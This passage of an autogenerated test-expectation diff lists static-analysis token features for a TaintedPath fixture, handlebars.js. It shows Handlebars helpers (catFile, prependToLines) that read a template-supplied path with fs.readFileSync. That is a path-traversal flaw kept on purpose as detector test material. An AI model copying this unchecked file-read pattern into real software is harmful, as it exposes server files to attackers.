contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:9:1:24:1 | return of function init | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:9:1:24:1 | return of function init | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:9:1:24:1 | return of function init | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:9:1:24:1 | return of function init | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:9:10:9:13 | init | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:9:10:9:13 | init | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:9:10:9:13 | init | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:9:10:9:13 | init | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:9:10:9:13 | init | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:9:10:9:13 | init | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:10:5:10:6 | hb | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:10:5:10:6 | hb | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:10:5:10:6 | hb | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:10:5:10:6 | hb | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:10:5:10:6 | hb | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:10:5:10:21 | hb.registerHelper | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:10:5:10:21 | hb.registerHelper | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:10:5:10:21 | hb.registerHelper | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:10:5:10:21 | hb.registerHelper | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:10:5:10:21 | hb.registerHelper | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:10:5:12:6 | exceptional return of hb.regi ... \\n }) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:10:5:12:6 | exceptional return of hb.regi ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:10:5:12:6 | exceptional return of hb.regi ... \\n }) | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:10:5:12:6 | exceptional return of hb.regi ... \\n }) | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:10:5:12:6 | exceptional return of hb.regi ... \\n }) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:10:5:12:6 | hb.regi ... \\n }) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:10:5:12:6 | hb.regi ... \\n }) | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:10:5:12:6 | hb.regi ... \\n }) | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:10:5:12:6 | hb.regi ... \\n }) | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:10:5:12:6 | hb.regi ... \\n }) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:10:8:10:21 | registerHelper | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:10:8:10:21 | registerHelper | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:10:8:10:21 | registerHelper | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:10:8:10:21 | registerHelper | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:10:8:10:21 | registerHelper | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:10:23:10:31 | "catFile" | CalleeFlexibleAccessPath | hb.registerHelper | | autogenerated/TaintedPath/handlebars.js:10:23:10:31 | "catFile" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/handlebars.js:10:23:10:31 | "catFile" | calleeImports | handlebars | @@ -7019,6 +67336,26 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:10:23:10:31 | "catFile" | enclosingFunctionName | init | | autogenerated/TaintedPath/handlebars.js:10:23:10:31 | "catFile" | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:10:23:10:31 | "catFile" | receiverName | hb | +| autogenerated/TaintedPath/handlebars.js:10:34:10:33 | fs | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:10:34:10:33 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:10:34:10:33 | fs | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:10:34:10:33 | fs | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:10:34:10:33 | fs | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:10:34:10:33 | this | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:10:34:10:33 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:10:34:10:33 | this | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:10:34:10:33 | this | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:10:34:10:33 | this | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:10:34:12:5 | 'arguments' object of function catFile | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:10:34:12:5 | 'arguments' object of function catFile | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:10:34:12:5 | 'arguments' object of function catFile | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:10:34:12:5 | 'arguments' object of function catFile | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:10:34:12:5 | 'arguments' object of function catFile | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:10:34:12:5 | exceptional return of function catFile | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:10:34:12:5 | exceptional return of function catFile | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:10:34:12:5 | exceptional return of function catFile | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:10:34:12:5 | exceptional return of function catFile | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:10:34:12:5 | exceptional return of function catFile | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:10:34:12:5 | functio ... )\\n } | CalleeFlexibleAccessPath | hb.registerHelper | | autogenerated/TaintedPath/handlebars.js:10:34:12:5 | functio ... )\\n } | InputArgumentIndex | 1 | | autogenerated/TaintedPath/handlebars.js:10:34:12:5 | functio ... )\\n } | calleeImports | handlebars | @@ -7028,6 +67365,51 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:10:34:12:5 | functio ... )\\n } | enclosingFunctionName | init | | autogenerated/TaintedPath/handlebars.js:10:34:12:5 | functio ... )\\n } | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:10:34:12:5 | functio ... )\\n } | receiverName | hb | +| autogenerated/TaintedPath/handlebars.js:10:34:12:5 | return of function catFile | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:10:34:12:5 | return of function catFile | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:10:34:12:5 | return of function catFile | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:10:34:12:5 | return of function catFile | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:10:34:12:5 | return of function catFile | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:10:43:10:49 | catFile | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:10:43:10:49 | catFile | contextSurroundingFunctionParameters | ()\n(filePath) | +| autogenerated/TaintedPath/handlebars.js:10:43:10:49 | catFile | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:10:43:10:49 | catFile | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:10:43:10:49 | catFile | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:10:51:10:58 | filePath | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:10:51:10:58 | filePath | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:10:51:10:58 | filePath | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:10:51:10:58 | filePath | contextSurroundingFunctionParameters | ()\n(filePath) | +| autogenerated/TaintedPath/handlebars.js:10:51:10:58 | filePath | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:10:51:10:58 | filePath | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:10:51:10:58 | filePath | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:10:51:10:58 | filePath | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:10:51:10:58 | filePath | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:10:51:10:58 | filePath | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:11:16:11:17 | fs | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:11:16:11:17 | fs | contextSurroundingFunctionParameters | ()\n(filePath) | +| autogenerated/TaintedPath/handlebars.js:11:16:11:17 | fs | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:11:16:11:17 | fs | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:11:16:11:17 | fs | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:11:16:11:30 | fs.readFileSync | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:11:16:11:30 | fs.readFileSync | contextSurroundingFunctionParameters | ()\n(filePath) | +| autogenerated/TaintedPath/handlebars.js:11:16:11:30 | fs.readFileSync | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:11:16:11:30 | fs.readFileSync | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:11:16:11:30 | fs.readFileSync | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:11:16:11:40 | exceptional return of fs.read ... lePath) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:11:16:11:40 | exceptional return of fs.read ... lePath) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:11:16:11:40 | exceptional return of fs.read ... lePath) | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:11:16:11:40 | exceptional return of fs.read ... lePath) | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:11:16:11:40 | exceptional return of fs.read ... lePath) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:11:16:11:40 | fs.read ... lePath) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:11:16:11:40 | fs.read ... lePath) | contextSurroundingFunctionParameters | ()\n(filePath) | +| autogenerated/TaintedPath/handlebars.js:11:16:11:40 | fs.read ... lePath) | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:11:16:11:40 | fs.read ... lePath) | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:11:16:11:40 | fs.read ... lePath) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:11:19:11:30 | readFileSync | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:11:19:11:30 | readFileSync | contextSurroundingFunctionParameters | ()\n(filePath) | +| autogenerated/TaintedPath/handlebars.js:11:19:11:30 | readFileSync | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:11:19:11:30 | readFileSync | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:11:19:11:30 | readFileSync | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:11:32:11:39 | filePath | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/handlebars.js:11:32:11:39 | filePath | InputArgumentIndex | 0 | | autogenerated/TaintedPath/handlebars.js:11:32:11:39 | filePath | calleeImports | fs | @@ -7037,6 +67419,31 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:11:32:11:39 | filePath | enclosingFunctionName | init | | autogenerated/TaintedPath/handlebars.js:11:32:11:39 | filePath | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:11:32:11:39 | filePath | receiverName | fs | +| autogenerated/TaintedPath/handlebars.js:13:5:13:6 | hb | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:13:5:13:6 | hb | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:13:5:13:6 | hb | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:13:5:13:6 | hb | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:13:5:13:6 | hb | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:13:5:13:21 | hb.registerHelper | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:13:5:13:21 | hb.registerHelper | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:13:5:13:21 | hb.registerHelper | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:13:5:13:21 | hb.registerHelper | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:13:5:13:21 | hb.registerHelper | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:13:5:19:6 | exceptional return of hb.regi ... \\n }) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:13:5:19:6 | exceptional return of hb.regi ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:13:5:19:6 | exceptional return of hb.regi ... \\n }) | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:13:5:19:6 | exceptional return of hb.regi ... \\n }) | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:13:5:19:6 | exceptional return of hb.regi ... \\n }) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:13:5:19:6 | hb.regi ... \\n }) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:13:5:19:6 | hb.regi ... \\n }) | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:13:5:19:6 | hb.regi ... \\n }) | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:13:5:19:6 | hb.regi ... \\n }) | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:13:5:19:6 | hb.regi ... \\n }) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:13:8:13:21 | registerHelper | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:13:8:13:21 | registerHelper | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:13:8:13:21 | registerHelper | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:13:8:13:21 | registerHelper | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:13:8:13:21 | registerHelper | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:13:23:13:38 | "prependToLines" | CalleeFlexibleAccessPath | hb.registerHelper | | autogenerated/TaintedPath/handlebars.js:13:23:13:38 | "prependToLines" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/handlebars.js:13:23:13:38 | "prependToLines" | calleeImports | handlebars | @@ -7046,6 +67453,31 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:13:23:13:38 | "prependToLines" | enclosingFunctionName | init | | autogenerated/TaintedPath/handlebars.js:13:23:13:38 | "prependToLines" | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:13:23:13:38 | "prependToLines" | receiverName | hb | +| autogenerated/TaintedPath/handlebars.js:13:41:13:40 | fs | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:13:41:13:40 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:13:41:13:40 | fs | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:13:41:13:40 | fs | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:13:41:13:40 | fs | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:13:41:13:40 | this | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:13:41:13:40 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:13:41:13:40 | this | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:13:41:13:40 | this | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:13:41:13:40 | this | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:13:41:13:41 | prefix | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:13:41:13:41 | prefix | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:13:41:13:41 | prefix | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:13:41:13:41 | prefix | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:13:41:13:41 | prefix | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:13:41:19:5 | 'arguments' object of function prependToLines | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:13:41:19:5 | 'arguments' object of function prependToLines | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:13:41:19:5 | 'arguments' object of function prependToLines | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:13:41:19:5 | 'arguments' object of function prependToLines | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:13:41:19:5 | 'arguments' object of function prependToLines | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:13:41:19:5 | exceptional return of function prependToLines | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:13:41:19:5 | exceptional return of function prependToLines | 